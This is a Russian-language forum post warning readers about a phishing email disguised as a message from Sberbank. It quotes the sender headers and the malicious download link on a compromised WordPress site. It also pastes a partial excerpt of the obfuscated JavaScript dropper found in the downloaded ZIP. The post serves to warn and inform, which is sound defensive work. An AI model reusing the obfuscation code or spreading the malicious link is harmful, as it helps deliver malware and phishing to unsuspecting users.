Jump to content

Странные письма, якобы от сбербанка, походу ))


Recommended Posts

Открываю почту, а там такое:

http://c2n.me/3JGMwav

http://c2n.me/3JGMzYT

Данные об отправители:

Цитата

smtp.mailfrom=web@bifubo.han-solo.net smtp.helo=bifubo.han-solo.net

Received: from bifubo.han-solo.net ([83.138.82.17]:18929)

	by mx224.i.mail.ru with esmtp (envelope-from <web@bifubo.han-solo.net>)

X-PHP-Script: haustec.net/nofx1p/baiqkajnaac/system_m_encrypted.php for 83.138.82.17

Ссылка ведет на эту страницу: olcudekorasyon.com/wp-includes/js/tinymce/plugins/wpdialogs/sber_schet.html скачивается документ и перенаправляет на основой сайт сбера.

Прикрепленный файл пустой..

Скачивает ZIP, содержимое JS файл (отрывок):

function UH()
{
	var Aso = "";
	return Aso;
}

function uw()
{
	var hQ = "";
	return hQ;
}

function Czk(Uv)
{
	return "charAt";
}

function lo(e)
{
	var fs = UH();
	fs += "'@j_lDO`z:RKbf1wH\\[SXYQ+6 %";
	fs += "#EL(VZig0A];e/>3=|";
	fs += "Jt{5Cv2M*4)Udor~yp.F!scN";
	fs += "axuG8$T9q,^<\"PnWm7I}k&?h-B";
	var ppo=989;
	var O=ppo+8293;
	var wwo=O/14;
	var PBh=wwo-632;
	var VTu = fs[Czk(e)](e-PBh);
	return VTu;
}


function Q()
{

var c=10840;

var GYW=65489;
return "l";
}
function dgy()
{

var wA=25168;
var Mud="x0!0In#";

return Q();
}
function Mm()
{

var VI=27596;

var Poo=58729;

return "e";
}
function LV()
{

var flQ=3203;
var cpQ="U^fCDQ12-p";

return Mm();
}
function Qa()
{

var N=57801;

	return dgy()+LV();
}
function Nz()
{
return lo(5016/44+0);
}
function kxH()
{
return lo(2925/45+0);
}

 

Вот такие дела ). Будьте бдительны, возможно это только начало, для крупного взлома или еще чего...

Link to post
Share on other sites
  • 2 weeks later...
  • 4 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...